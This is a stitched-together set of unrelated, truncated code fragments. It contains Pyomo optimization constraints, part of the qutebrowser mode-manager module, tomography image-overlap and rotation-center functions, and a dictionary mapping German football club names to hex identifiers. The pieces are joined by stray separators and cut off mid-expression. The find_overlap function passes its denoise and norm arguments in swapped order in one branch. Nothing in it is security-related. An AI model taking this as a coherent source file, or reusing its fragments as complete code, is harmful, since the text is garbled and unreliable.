m.c330 = Constraint(expr=m.x532 - (0.0025*(m.x129*(m.x330 - 10*m.x531) - (1 - m.x129)*m.x531 + m.x130*(m.x331 - 10*
m.x532) - (1 - m.x130)*m.x532) + m.x531) == 0)
m.c331 = Constraint(expr=m.x533 - (0.0025*(m.x130*(m.x331 - 10*m.x532) - (1 - m.x130)*m.x532 + m.x131*(m.x332 - 10*
m.x533) - (1 - m.x131)*m.x533) + m.x532) == 0)
m.c332 = Constraint(expr=m.x534 - (0.0025*(m.x131*(m.x332 - 10*m.x533) - (1 - m.x131)*m.x533 + m.x132*(m.x333 - 10*
m.x534) - (1 - m.x132)*m.x534) + m.x533) == 0)
m.c333 = Constraint(expr=m.x535 - (0.0025*(m.x132*(m.x333 - 10*m.x534) - (1 - m.x132)*m.x534 + m.x133*(m.x334 - 10*
m.x535) - (1 - m.x133)*m.x535) + m.x534) == 0)
m.c334 = Constraint(expr=m.x536 - (0.0025*(m.x133*(m.x334 - 10*m.x535) - (1 - m.x133)*m.x535 + m.x134*(m.x335 - 10*
m.x536) - (1 - m.x134)*m.x536) + m.x535) == 0)
m.c335 = Constraint(expr=m.x537 - (0.0025*(m.x134*(m.x335 - 10*m.x536) - (1 - m.x134)*m.x536 + m.x135*(m.x336 - 10*
m.x537) - (1 - m.x135)*m.x537) + m.x536) == 0)
m.c336 = Constraint(expr=m.x538 - (0.0025*(m.x135*(m.x336 - 10*m.x537) - (1 - m.x135)*m.x537 + m.x136*(m.x337 - 10*
m.x538) - (1 - m.x136)*m.x538) + m.x537) == 0)
m.c337 = Constraint(expr=m.x539 - (0.0025*(m.x136*(m.x337 - 10*m.x538) - (1 - m.x136)*m.x538 + m.x137*(m.x338 - 10*
m.x539) - (1 - m.x137)*m.x539) + m.x538) == 0)
m.c338 = Constraint(expr=m.x540 - (0.0025*(m.x137*(m.x338 - 10*m.x539) - (1 - m.x137)*m.x539 + m.x138*(m.x339 - 10*
m.x540) - (1 - m.x138)*m.x540) + m.x539) == 0)
m.c339 = Constraint(expr=m.x541 - (0.0025*(m.x138*(m.x339 - 10*m.x540) - (1 - m.x138)*m.x540 + m.x139*(m.x340 - 10*
m.x541) - (1 - m.x139)*m.x541) + m.x540) == 0)
m.c340 = Constraint(expr=m.x542 - (0.0025*(m.x139*(m.x340 - 10*m.x541) - (1 - m.x139)*m.x541 + m.x140*(m.x341 - 10*
m.x542) - (1 - m.x140)*m.x542) + m.x541) == 0)
m.c341 = Constraint(expr=m.x543 - (0.0025*(m.x140*(m.x341 - 10*m.x542) - (1 - m.x140)*m.x542 + m.x141*(m.x342 - 10*
m.x543) - (1 - m.x141)*m.x543) + m.x542) == 0)
m.c342 = Constraint(expr=m.x544 - (0.0025*(m.x141*(m.x342 - 10*m.x543) - (1 - m.x141)*m.x543 + m.x142*(m.x343 - 10*
m.x544) - (1 - m.x142)*m.x544) + m.x543) == 0)
m.c343 = Constraint(expr=m.x545 - (0.0025*(m.x142*(m.x343 - 10*m.x544) - (1 - m.x142)*m.x544 + m.x143*(m.x344 - 10*
m.x545) - (1 - m.x143)*m.x545) + m.x544) == 0)
m.c344 = Constraint(expr=m.x546 - (0.0025*(m.x143*(m.x344 - 10*m.x545) - (1 - m.x143)*m.x545 + m.x144*(m.x345 - 10*
m.x546) - (1 - m.x144)*m.x546) + m.x545) == 0)
m.c345 = Constraint(expr=m.x547 - (0.0025*(m.x144*(m.x345 - 10*m.x546) - (1 - m.x144)*m.x546 + m.x145*(m.x346 - 10*
m.x547) - (1 - m.x145)*m.x547) + m.x546) == 0)
m.c346 = Constraint(expr=m.x548 - (0.0025*(m.x145*(m.x346 - 10*m.x547) - (1 - m.x145)*m.x547 + m.x146*(m.x347 - 10*
m.x548) - (1 - m.x146)*m.x548) + m.x547) == 0)
m.c347 = Constraint(expr=m.x549 - (0.0025*(m.x146*(m.x347 - 10*m.x548) - (1 - m.x146)*m.x548 + m.x147*(m.x348 - 10*
m.x549) - (1 - m.x147)*m.x549) + m.x548) == 0)
m.c348 = Constraint(expr=m.x550 - (0.0025*(m.x147*(m.x348 - 10*m.x549) - (1 - m.x147)*m.x549 + m.x148*(m.x349 - 10*
m.x550) - (1 - m.x148)*m.x550) + m.x549) == 0)
m.c349 = Constraint(expr=m.x551 - (0.0025*(m.x148*(m.x349 - 10*m.x550) - (1 - m.x148)*m.x550 + m.x149*(m.x350 - 10*
m.x551) - (1 - m.x149)*m.x551) + m.x550) == 0)
m.c350 = Constraint(expr=m.x552 - (0.0025*(m.x149*(m.x350 - 10*m.x551) - (1 - m.x149)*m.x551 + m.x150*(m.x351 - 10*
m.x552) - (1 - m.x150)*m.x552) + m.x551) == 0)
m.c351 = Constraint(expr=m.x553 - (0.0025*(m.x150*(m.x351 - 10*m.x552) - (1 - m.x150)*m.x552 + m.x151*(m.x352 - 10*
m.x553) - (1 - m.x151)*m.x553) + m.x552) == 0)
m.c352 = Constraint(expr=m.x554 - (0.0025*(m.x151*(m.x352 - 10*m.x553) - (1 - m.x151)*m.x553 + m.x152*(m.x353 - 10*
m.x554) - (1 - m.x152)*m.x554) + m.x553) == 0)
m.c353 = Constraint(expr=m.x555 - (0.0025*(m.x152*(m.x353 - 10*m.x554) - (1 - m.x152)*m.x554 + m.x153*(m.x354 - 10*
m.x555) - (1 - m.x153)*m.x555) + m.x554) == 0)
m.c354 = Constraint(expr=m.x556 - (0.0025*(m.x153*(m.x354 - 10*m.x555) - (1 - m.x153)*m.x555 + m.x154*(m.x355 - 10*
m.x556) - (1 - m.x154)*m.x556) + m.x555) == 0)
m.c355 = Constraint(expr=m.x557 - (0.0025*(m.x154*(m.x355 - 10*m.x556) - (1 - m.x154)*m.x556 + m.x155*(m.x356 - 10*
m.x557) - (1 - m.x155)*m.x557) + m.x556) == 0)
m.c356 = Constraint(expr=m.x558 - (0.0025*(m.x155*(m.x356 - 10*m.x557) - (1 - m.x155)*m.x557 + m.x156*(m.x357 - 10*
m.x558) - (1 - m.x156)*m.x558) + m.x557) == 0)
m.c357 = Constraint(expr=m.x559 - (0.0025*(m.x156*(m.x357 - 10*m.x558) - (1 - m.x156)*m.x558 + m.x157*(m.x358 - 10*
m.x559) - (1 - m.x157)*m.x559) + m.x558) == 0)
m.c358 = Constraint(expr=m.x560 - (0.0025*(m.x157*(m.x358 - 10*m.x559) - (1 - m.x157)*m.x559 + m.x158*(m.x359 - 10*
m.x560) - (1 - m.x158)*m.x560) + m.x559) == 0)
m.c359 = Constraint(expr=m.x561 - (0.0025*(m.x158*(m.x359 - 10*m.x560) - (1 - m.x158)*m.x560 + m.x159*(m.x360 - 10*
m.x561) - (1 - m.x159)*m.x561) + m.x560) == 0)
m.c360 = Constraint(expr=m.x562 - (0.0025*(m.x159*(m.x360 - 10*m.x561) - (1 - m.x159)*m.x561 + m.x160*(m.x361 - 10*
m.x562) - (1 - m.x160)*m.x562) + m.x561) == 0)
m.c361 = Constraint(expr=m.x563 - (0.0025*(m.x160*(m.x361 - 10*m.x562) - (1 - | |
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2021 <NAME> (The Compiler) <<EMAIL>>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <https://www.gnu.org/licenses/>.
"""Mode manager (per window) which handles the current keyboard mode."""
import functools
import dataclasses
from typing import Mapping, Callable, MutableMapping, Union, Set, cast
from PyQt5.QtCore import pyqtSlot, pyqtSignal, Qt, QObject, QEvent
from PyQt5.QtGui import QKeyEvent
from qutebrowser.commands import runners
from qutebrowser.keyinput import modeparsers, basekeyparser
from qutebrowser.config import config
from qutebrowser.api import cmdutils
from qutebrowser.utils import usertypes, log, objreg, utils
from qutebrowser.browser import hints
from qutebrowser.misc import objects
INPUT_MODES = [usertypes.KeyMode.insert, usertypes.KeyMode.passthrough]
PROMPT_MODES = [usertypes.KeyMode.prompt, usertypes.KeyMode.yesno]
ParserDictType = MutableMapping[usertypes.KeyMode, basekeyparser.BaseKeyParser]
@dataclasses.dataclass(frozen=True)
class KeyEvent:
"""A small wrapper over a QKeyEvent storing its data.
This is needed because Qt apparently mutates existing events with new data.
It doesn't store the modifiers because they can be different for a key
press/release.
Attributes:
key: A Qt.Key member (QKeyEvent::key).
text: A string (QKeyEvent::text).
"""
key: Qt.Key
text: str
@classmethod
def from_event(cls, event: QKeyEvent) -> 'KeyEvent':
"""Initialize a KeyEvent from a QKeyEvent."""
return cls(Qt.Key(event.key()), event.text())
class NotInModeError(Exception):
"""Exception raised when we want to leave a mode we're not in."""
class UnavailableError(Exception):
"""Exception raised when trying to access modeman before initialization.
Thrown by instance() if modeman has not been initialized yet.
"""
def init(win_id: int, parent: QObject) -> 'ModeManager':
"""Initialize the mode manager and the keyparsers for the given win_id."""
commandrunner = runners.CommandRunner(win_id)
modeman = ModeManager(win_id, parent)
objreg.register('mode-manager', modeman, scope='window', window=win_id)
hintmanager = hints.HintManager(win_id, parent=parent)
objreg.register('hintmanager', hintmanager, scope='window',
window=win_id, command_only=True)
modeman.hintmanager = hintmanager
log_sensitive_keys = 'log-sensitive-keys' in objects.debug_flags
keyparsers: ParserDictType = {
usertypes.KeyMode.normal:
modeparsers.NormalKeyParser(
win_id=win_id,
commandrunner=commandrunner,
parent=modeman),
usertypes.KeyMode.hint:
modeparsers.HintKeyParser(
win_id=win_id,
commandrunner=commandrunner,
hintmanager=hintmanager,
parent=modeman),
usertypes.KeyMode.insert:
modeparsers.CommandKeyParser(
mode=usertypes.KeyMode.insert,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman,
passthrough=True,
do_log=log_sensitive_keys,
supports_count=False),
usertypes.KeyMode.passthrough:
modeparsers.CommandKeyParser(
mode=usertypes.KeyMode.passthrough,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman,
passthrough=True,
do_log=log_sensitive_keys,
supports_count=False),
usertypes.KeyMode.command:
modeparsers.CommandKeyParser(
mode=usertypes.KeyMode.command,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman,
passthrough=True,
do_log=log_sensitive_keys,
supports_count=False),
usertypes.KeyMode.prompt:
modeparsers.CommandKeyParser(
mode=usertypes.KeyMode.prompt,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman,
passthrough=True,
do_log=log_sensitive_keys,
supports_count=False),
usertypes.KeyMode.yesno:
modeparsers.CommandKeyParser(
mode=usertypes.KeyMode.yesno,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman,
supports_count=False),
usertypes.KeyMode.caret:
modeparsers.CommandKeyParser(
mode=usertypes.KeyMode.caret,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman,
passthrough=True),
usertypes.KeyMode.set_mark:
modeparsers.RegisterKeyParser(
mode=usertypes.KeyMode.set_mark,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman),
usertypes.KeyMode.jump_mark:
modeparsers.RegisterKeyParser(
mode=usertypes.KeyMode.jump_mark,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman),
usertypes.KeyMode.record_macro:
modeparsers.RegisterKeyParser(
mode=usertypes.KeyMode.record_macro,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman),
usertypes.KeyMode.run_macro:
modeparsers.RegisterKeyParser(
mode=usertypes.KeyMode.run_macro,
win_id=win_id,
commandrunner=commandrunner,
parent=modeman),
}
for mode, parser in keyparsers.items():
modeman.register(mode, parser)
return modeman
def instance(win_id: Union[int, str]) -> 'ModeManager':
"""Get a modemanager object.
Raises UnavailableError if there is no instance available yet.
"""
mode_manager = objreg.get('mode-manager', scope='window', window=win_id,
default=None)
if mode_manager is not None:
return mode_manager
else:
raise UnavailableError("ModeManager is not initialized yet.")
def enter(win_id: int,
mode: usertypes.KeyMode,
reason: str = None,
only_if_normal: bool = False) -> None:
"""Enter the mode 'mode'."""
instance(win_id).enter(mode, reason, only_if_normal)
def leave(win_id: int,
mode: usertypes.KeyMode,
reason: str = None, *,
maybe: bool = False) -> None:
"""Leave the mode 'mode'."""
instance(win_id).leave(mode, reason, maybe=maybe)
class ModeManager(QObject):
"""Manager for keyboard modes.
Attributes:
mode: The mode we're currently in.
hintmanager: The HintManager associated with this window.
_win_id: The window ID of this ModeManager
_prev_mode: Mode before a prompt popped up
parsers: A dictionary of modes and their keyparsers.
_forward_unbound_keys: If we should forward unbound keys.
_releaseevents_to_pass: A set of KeyEvents where the keyPressEvent was
passed through, so the release event should as
well.
Signals:
entered: Emitted when a mode is entered.
arg1: The mode which has been entered.
arg2: The window ID of this mode manager.
left: Emitted when a mode is left.
arg1: The mode which has been left.
arg2: The new current mode.
arg3: The window ID of this mode manager.
keystring_updated: Emitted when the keystring was updated in any mode.
arg 1: The mode in which the keystring has been
updated.
arg 2: The new key string.
"""
entered = pyqtSignal(usertypes.KeyMode, int)
left = pyqtSignal(usertypes.KeyMode, usertypes.KeyMode, int)
keystring_updated = pyqtSignal(usertypes.KeyMode, str)
def __init__(self, win_id: int, parent: QObject = None) -> None:
super().__init__(parent)
self._win_id = win_id
self.parsers: ParserDictType = {}
self._prev_mode = usertypes.KeyMode.normal
self.mode = usertypes.KeyMode.normal
self._releaseevents_to_pass: Set[KeyEvent] = set()
# Set after __init__
self.hintmanager = cast(hints.HintManager, None)
def __repr__(self) -> str:
return utils.get_repr(self, mode=self.mode)
def _handle_keypress(self, event: QKeyEvent, *,
dry_run: bool = False) -> bool:
"""Handle filtering of KeyPress events.
Args:
event: The KeyPress to examine.
dry_run: Don't actually handle the key, only filter it.
Return:
True if event should be filtered, False otherwise.
"""
curmode = self.mode
parser = self.parsers[curmode]
if curmode != usertypes.KeyMode.insert:
log.modes.debug("got keypress in mode {} - delegating to {}".format(
utils.pyenum_str(curmode), utils.qualname(parser)))
match = parser.handle(event, dry_run=dry_run)
has_modifier = event.modifiers() not in [
Qt.NoModifier,
Qt.ShiftModifier,
] # type: ignore[comparison-overlap]
is_non_alnum = has_modifier or not event.text().strip()
forward_unbound_keys = config.cache['input.forward_unbound_keys']
if match:
filter_this = True
elif (parser.passthrough or forward_unbound_keys == 'all' or
(forward_unbound_keys == 'auto' and is_non_alnum)):
filter_this = False
else:
filter_this = True
if not filter_this and not dry_run:
self._releaseevents_to_pass.add(KeyEvent.from_event(event))
if curmode != usertypes.KeyMode.insert:
focus_widget = objects.qapp.focusWidget()
log.modes.debug("match: {}, forward_unbound_keys: {}, "
"passthrough: {}, is_non_alnum: {}, dry_run: {} "
"--> filter: {} (focused: {!r})".format(
match, forward_unbound_keys,
parser.passthrough, is_non_alnum, dry_run,
filter_this, focus_widget))
return filter_this
def _handle_keyrelease(self, event: QKeyEvent) -> bool:
"""Handle filtering of KeyRelease events.
Args:
event: The KeyPress to examine.
Return:
True if event should be filtered, False otherwise.
"""
# handle like matching KeyPress
keyevent = KeyEvent.from_event(event)
if keyevent in self._releaseevents_to_pass:
self._releaseevents_to_pass.remove(keyevent)
filter_this = False
else:
filter_this = True
if self.mode != usertypes.KeyMode.insert:
log.modes.debug("filter: {}".format(filter_this))
return filter_this
def register(self, mode: usertypes.KeyMode,
parser: basekeyparser.BaseKeyParser) -> None:
"""Register a new mode."""
assert parser is not None
self.parsers[mode] = parser
parser.request_leave.connect(self.leave)
parser.keystring_updated.connect(
functools.partial(self.keystring_updated.emit, mode))
def enter(self, mode: usertypes.KeyMode,
reason: str = None,
only_if_normal: bool = False) -> None:
"""Enter a new mode.
Args:
mode: The mode to enter as a KeyMode member.
reason: Why the mode was entered.
only_if_normal: Only enter the new mode if we're in normal mode.
"""
if mode == usertypes.KeyMode.normal:
self.leave(self.mode, reason='enter normal: {}'.format(reason))
return
log.modes.debug("Entering mode {}{}".format(
utils.pyenum_str(mode),
'' if reason is None else ' (reason: {})'.format(reason)))
if mode not in self.parsers:
raise ValueError("No keyparser for mode {}".format(mode))
if self.mode == mode or (self.mode in PROMPT_MODES and
mode in PROMPT_MODES):
log.modes.debug("Ignoring request as we're in mode {} "
"already.".format(self.mode))
return
if self.mode != usertypes.KeyMode.normal:
if only_if_normal:
log.modes.debug("Ignoring request as we're in mode {} "
"and only_if_normal is set..".format(
self.mode))
return
log.modes.debug("Overriding mode {}.".format(self.mode))
self.left.emit(self.mode, mode, self._win_id)
if mode in PROMPT_MODES and self.mode in INPUT_MODES:
self._prev_mode = self.mode
else:
self._prev_mode = usertypes.KeyMode.normal
self.mode = mode
self.entered.emit(mode, self._win_id)
@cmdutils.register(instance='mode-manager', scope='window')
def mode_enter(self, mode: str) -> None:
"""Enter a key mode.
Args:
mode: The mode to enter. See `:help bindings.commands` for the
available modes, but note that hint/command/yesno/prompt mode
can't be entered manually.
"""
try:
m = usertypes.KeyMode[mode]
except KeyError:
raise cmdutils.CommandError("Mode {} does not exist!".format(mode))
if m in [usertypes.KeyMode.hint, usertypes.KeyMode.command,
usertypes.KeyMode.yesno, usertypes.KeyMode.prompt,
usertypes.KeyMode.register]:
raise cmdutils.CommandError(
"Mode {} can't be entered manually!".format(mode))
self.enter(m, 'command')
@pyqtSlot(usertypes.KeyMode, str, bool)
def leave(self, mode: usertypes.KeyMode,
reason: str = None,
maybe: bool = False) -> None:
"""Leave a key mode.
Args:
mode: The mode to leave as a usertypes.KeyMode member.
reason: Why the mode was left.
maybe: If set, ignore the request if we're not in that mode.
"""
if self.mode != mode:
if maybe:
log.modes.debug("Ignoring leave request for {} (reason {}) as "
"we're in mode {}".format(
mode, reason, self.mode))
return
else:
raise NotInModeError("Not in mode {}!".format(mode))
log.modes.debug("Leaving mode {}{}".format(
utils.pyenum_str(mode),
'' if reason is None else ' (reason: {})'.format(reason)))
# leaving a mode implies clearing keychain, see
# https://github.com/qutebrowser/qutebrowser/issues/1805
self.clear_keychain()
self.mode = usertypes.KeyMode.normal
self.left.emit(mode, self.mode, self._win_id)
if mode in PROMPT_MODES:
self.enter(self._prev_mode,
reason='restore mode before {}'.format(mode.name))
@cmdutils.register(instance='mode-manager',
not_modes=[usertypes.KeyMode.normal], scope='window')
def mode_leave(self) -> None:
"""Leave the mode we're currently in."""
if self.mode | |
2 * radi + 1), list1, 2)
list2 = list_metric[min_pos - 1:min_pos + 2]
(afact2, bfact2, _) = np.polyfit(
np.arange(min_pos - 1, min_pos + 2), list2, 2)
curvature = np.abs(afact1)
if afact2 != 0.0:
num = - bfact2 / (2 * afact2)
if (num >= min_pos - 1) and (num <= min_pos + 1):
min_pos = num
return curvature, np.float32(min_pos)
def correlation_metric(mat1, mat2):
"""
Calculate the correlation metric. Smaller metric corresponds to better
correlation.
Parameters
---------
mat1 : array_like
mat2 : array_like
Returns
-------
float
Correlation metric.
"""
metric = np.abs(
1.0 - stats.pearsonr(mat1.flatten('F'), mat2.flatten('F'))[0])
return metric
def search_overlap(mat1, mat2, win_width, side, denoise=True, norm=False,
use_overlap=False):
"""
Calculate the correlation metrics between a rectangular region, defined
by the window width, on the utmost left/right side of image 2 and the
same size region in image 1 where the region is slided across image 1.
Parameters
----------
mat1 : array_like
2D array. Projection image or sinogram image.
mat2 : array_like
2D array. Projection image or sinogram image.
win_width : int
Width of the searching window.
side : {0, 1}
Only two options: 0 or 1. It is used to indicate the overlap side
respects to image 1. "0" corresponds to the left side. "1" corresponds
to the right side.
denoise : bool, optional
Apply the Gaussian filter if True.
norm : bool, optional
Apply the normalization if True.
use_overlap : bool, optional
Use the combination of images in the overlap area for calculating
correlation coefficients if True.
Returns
-------
list_metric : array_like
1D array. List of the correlation metrics.
offset : int
Initial position of the searching window where the position
corresponds to the center of the window.
"""
if denoise is True:
mat1 = ndi.gaussian_filter(mat1, (2, 2), mode='reflect')
mat2 = ndi.gaussian_filter(mat2, (2, 2), mode='reflect')
(nrow1, ncol1) = mat1.shape
(nrow2, ncol2) = mat2.shape
if nrow1 != nrow2:
raise ValueError("Two images are not at the same height!!!")
win_width = np.int16(np.clip(win_width, 6, min(ncol1, ncol2) // 2 - 1))
offset = win_width // 2
win_width = 2 * offset # Make it even
ramp_down = np.linspace(1.0, 0.0, win_width)
ramp_up = 1.0 - ramp_down
wei_down = np.tile(ramp_down, (nrow1, 1))
wei_up = np.tile(ramp_up, (nrow1, 1))
if side == 1:
mat2_roi = mat2[:, 0:win_width]
mat2_roi_wei = mat2_roi * wei_up
else:
mat2_roi = mat2[:, ncol2 - win_width:]
mat2_roi_wei = mat2_roi * wei_down
list_mean2 = np.mean(np.abs(mat2_roi), axis=1)
list_pos = np.arange(offset, ncol1 - offset)
num_metric = len(list_pos)
list_metric = np.ones(num_metric, dtype=np.float32)
for i, pos in enumerate(list_pos):
mat1_roi = mat1[:, pos - offset:pos + offset]
if use_overlap is True:
if side == 1:
mat1_roi_wei = mat1_roi * wei_down
else:
mat1_roi_wei = mat1_roi * wei_up
if norm is True:
list_mean1 = np.mean(np.abs(mat1_roi), axis=1)
list_fact = list_mean2 / list_mean1
mat_fact = np.transpose(np.tile(list_fact, (win_width, 1)))
mat1_roi = mat1_roi * mat_fact
if use_overlap is True:
mat1_roi_wei = mat1_roi_wei * mat_fact
if use_overlap is True:
mat_comb = mat1_roi_wei + mat2_roi_wei
list_metric[i] = (correlation_metric(mat1_roi, mat2_roi)
+ correlation_metric(mat1_roi, mat_comb)
+ correlation_metric(mat2_roi, mat_comb)) / 3.0
else:
list_metric[i] = correlation_metric(mat1_roi, mat2_roi)
min_metric = np.min(list_metric)
if min_metric != 0.0:
list_metric = list_metric / min_metric
return list_metric, offset
def find_overlap(mat1, mat2, win_width, side=None, denoise=True, norm=False,
use_overlap=False):
"""
Find the overlap area and overlap side between two images (Ref. [1]) where
the overlap side referring to the first image.
Parameters
----------
mat1 : array_like
2D array. Projection image or sinogram image.
mat2 : array_like
2D array. Projection image or sinogram image.
win_width : int
Width of the searching window.
side : {None, 0, 1}, optional
Only there options: None, 0, or 1. "None" corresponding to fully
automated determination. "0" corresponding to the left side. "1"
corresponding to the right side.
denoise : bool, optional
Apply the Gaussian filter if True.
norm : bool, optional
Apply the normalization if True.
use_overlap : bool, optional
Use the combination of images in the overlap area for calculating
correlation coefficients if True.
Returns
-------
overlap : float
Width of the overlap area between two images.
side : int
Overlap side between two images.
overlap_position : float
Position of the window in the first image giving the best
correlation metric.
References
----------
.. [1] https://doi.org/10.1364/OE.418448
"""
(_, ncol1) = mat1.shape
(_, ncol2) = mat2.shape
win_width = np.int16(np.clip(win_width, 6, min(ncol1, ncol2) // 2))
if side == 1:
(list_metric, offset) = search_overlap(mat1, mat2, win_width, side,
denoise, norm, use_overlap)
(_, overlap_position) = calculate_curvature(list_metric)
overlap_position = overlap_position + offset
overlap = ncol1 - overlap_position + win_width // 2
elif side == 0:
(list_metric, offset) = search_overlap(mat1, mat2, win_width, side,
denoise, norm, use_overlap)
(_, overlap_position) = calculate_curvature(list_metric)
overlap_position = overlap_position + offset
overlap = overlap_position + win_width // 2
else:
(list_metric1, offset1) = search_overlap(mat1, mat2, win_width, 1, norm,
denoise, use_overlap)
(list_metric2, offset2) = search_overlap(mat1, mat2, win_width, 0, norm,
denoise, use_overlap)
(curvature1, overlap_position1) = calculate_curvature(list_metric1)
overlap_position1 = overlap_position1 + offset1
(curvature2, overlap_position2) = calculate_curvature(list_metric2)
overlap_position2 = overlap_position2 + offset2
if curvature1 > curvature2:
side = 1
overlap_position = overlap_position1
overlap = ncol1 - overlap_position + win_width // 2
else:
side = 0
overlap_position = overlap_position2
overlap = overlap_position + win_width // 2
return overlap, side, overlap_position
def find_overlap_multiple(list_mat, win_width, side=None, denoise=True,
norm=False, use_overlap=False):
"""
Find the overlap-areas and overlap-sides of a list of images where the
overlap side referring to the previous image.
Parameters
----------
list_mat : list of array_like
List of 2D array. Projection image or sinogram image.
win_width : int
Width of the searching window.
side : {None, 0, 1}, optional
Only there options: None, 0, or 1. "None" corresponding to fully
automated determination. "0" corresponding to the left side. "1"
corresponding to the right side.
denoise : bool, optional
Apply the Gaussian filter if True.
norm : bool, optional
Apply the normalization if True.
use_overlap : bool, optional
Use the combination of images in the overlap area for calculating
correlation coefficients if True.
Returns
-------
list_overlap : list of tuple of floats
List of [overlap, side, overlap_position].
overlap : Width of the overlap area between two images.
side : Overlap side between two images.
overlap_position : Position of the window in the first
image giving the best correlation metric.
"""
list_overlap = []
num_mat = len(list_mat)
if num_mat > 1:
for i in range(num_mat-1):
results = find_overlap(list_mat[i], list_mat[i + 1], win_width,
side, denoise, norm, use_overlap)
list_overlap.append(results)
else:
raise ValueError("Need at least 2 images to work!!!")
return list_overlap
def find_center_360(sino_360, win_width, side=None, denoise=True, norm=False,
use_overlap=False):
"""
Find the center-of-rotation (COR) in a 360-degree scan with offset COR use
the method presented in Ref. [1].
Parameters
----------
sino_360 : array_like
2D array. 360-degree sinogram.
win_width : int
Window width used for finding the overlap area.
side : {None, 0, 1}, optional
Overlap size. Only there options: None, 0, or 1. "None" corresponding
to fully automated determination. "0" corresponding to the left side.
"1" corresponding to the right side.
denoise : bool, optional
Apply the Gaussian filter if True.
norm : bool, optional
Apply the normalization if True.
use_overlap : bool, optional
Use the combination of images in the overlap area for calculating
correlation coefficients if True.
Returns
-------
cor : float
Center-of-rotation.
overlap : float
Width of the overlap area between two halves of the sinogram.
side : int
Overlap side between two halves of the sinogram.
overlap_position : float
Position of the window in the first image giving the best
correlation metric.
References
----------
.. [1] https://doi.org/10.1364/OE.418448
"""
(nrow, ncol) = sino_360.shape
nrow_180 = nrow // 2 + 1
sino_top = sino_360[0:nrow_180, :]
sino_bot = np.fliplr(sino_360[-nrow_180:, :])
(overlap, side, overlap_position) = find_overlap(
sino_top, sino_bot, win_width, side, denoise, norm, use_overlap)
if side == 0:
cor = overlap / 2.0 - 1.0
else:
cor = ncol - overlap / 2.0 - 1.0
return cor, overlap, side, overlap_position
def complex_gradient(mat):
"""
Return complex gradient of a 2D array.
"""
mat1a = np.roll(mat, -2, axis=1)
mat2a = mat1a - mat
mat2a[:, :2] = | |
u19': '3755f67e',
'sc hauenstein': '3e994daf',
'sc paderborn 07': 'd9f93f02',
'paderborn 07': 'd9f93f02',
'sc paderborn 07 u17': '6df34a06',
'sc paderborn 07 u19': 'd9f72365',
'sc preußen 06 münster u17': '9d619fa8',
'sc preussen 06 munster u17': '9d619fa8',
'sc preußen 06 münster u19': '21499441',
'sc preussen 06 munster u19': '21499441',
'sc preußen münster': 'bbcef8c7',
'preussen munster': 'bbcef8c7',
'sc rot-weiß oberhausen u19': '23ced855',
'sc rot weiss oberhausen u19': '23ced855',
'sc sand': '0cc34cf4',
'sand': '0cc34cf4',
'sc verl': '131bc303',
'sc weiche flensburg 08': 'b979b61c',
'sg 99 andernach': '62006b94',
'sg dynamo dresden u17': '4e32ce87',
'sg dynamo dresden u19': 'e7f2df64',
'sg sonnenhof großaspach': 'a5e62940',
'sonnenhof grossaspach': 'a5e62940',
'sg unterrath u17': 'c7038b7d',
'sg wattenscheid 09': '6f7db76a',
'sgs essen': 'becc1dd0',
'essen': 'becc1dd0',
'sportfreunde dorfmerkingen': 'cf68b22f',
'sportfreunde lotte': '1573023f',
'sportfreunde siegen': '405a2854',
'spvg berghofen': 'b4b4ac38',
'spvgg greuther fürth': '12192a4c',
'greuther furth': '12192a4c',
'spvgg greuther fürth 1903 u17': '7880a87b',
'spvgg greuther furth 1903 u17': '7880a87b',
'spvgg greuther fürth 1903 u19': '5af9af80',
'spvgg greuther furth 1903 u19': '5af9af80',
'spvgg unterhaching': 'ba68a0c5',
'unterhaching': 'ba68a0c5',
'spvgg unterhaching u17': 'c1893176',
'spvgg unterhaching u19': 'ec68d97a',
'ssv jahn regensburg': '5cb328f2',
'jahn regensburg': '5cb328f2',
'ssv jeddeloh': '8f440eed',
'ssv reutlingen 05': '9cc4f801',
'ssv ulm 1846': '291257b3',
'ulm 1846': '291257b3',
'ssv ulm 1846 u17': 'd59864e1',
'ssv ulm 1846 u19': 'ce50e2f4',
'stuttgarter kickers': 'ee8f53af',
'sv 07 elversberg u17': '19661cac',
'sv 67 weinberg': '5bf4fa86',
'sv alemannia waldalgesheim': 'eca78ff6',
'sv atlas delmenhorst': 'b4043eb2',
'sv babelsberg 03': 'e28cb2a4',
'babelsberg 03': 'e28cb2a4',
'sv darmstadt 98': '6a6967fc',
'darmstadt 98': '6a6967fc',
'sv darmstadt 98 u17': '61fca1ee',
'sv darmstadt 98 u19': 'e3ab73b4',
'sv drochtersen/assel': 'a6882ace',
'sv drochtersenassel': 'a6882ace',
'sv eichede': '5ac21fc8',
'sv eintracht trier 05': '041d5c51',
'eintracht trier': '041d5c51',
'sv elversberg': 'fe686760',
'elversberg': 'fe686760',
'sv göttelborn': 'ad5c423d',
'sv gottelborn': 'ad5c423d',
'sv hegnach': 'e14d6baf',
'sv holzbach': '11a6ae86',
'sv linx': '2cca410b',
'sv meppen': '93e94415',
'meppen': '93e94415',
'sv morlautern': '59f8532f',
'sv rödinghausen': 'f7b1bcce',
'sv rodinghausen': 'f7b1bcce',
'sv rödinghausen u19': '4a929269',
'sv rodinghausen u19': '4a929269',
'sv sandhausen': 'c241ee1a',
'sandhausen': 'c241ee1a',
'sv sandhausen 1916 u17': 'f5337a87',
'sv stuttgarter kickers u17': 'f73b15cf',
'sv stuttgarter kickers u19': 'b638db7a',
'sv wacker burghausen': '3ec823ca',
'wacker burghausen': '3ec823ca',
'sv waldhof mannheim': '151d706e',
'sv waldkirch': 'd38e4870',
'sv wehen wiesbaden': '432f2430',
'wehen wiesbaden': '432f2430',
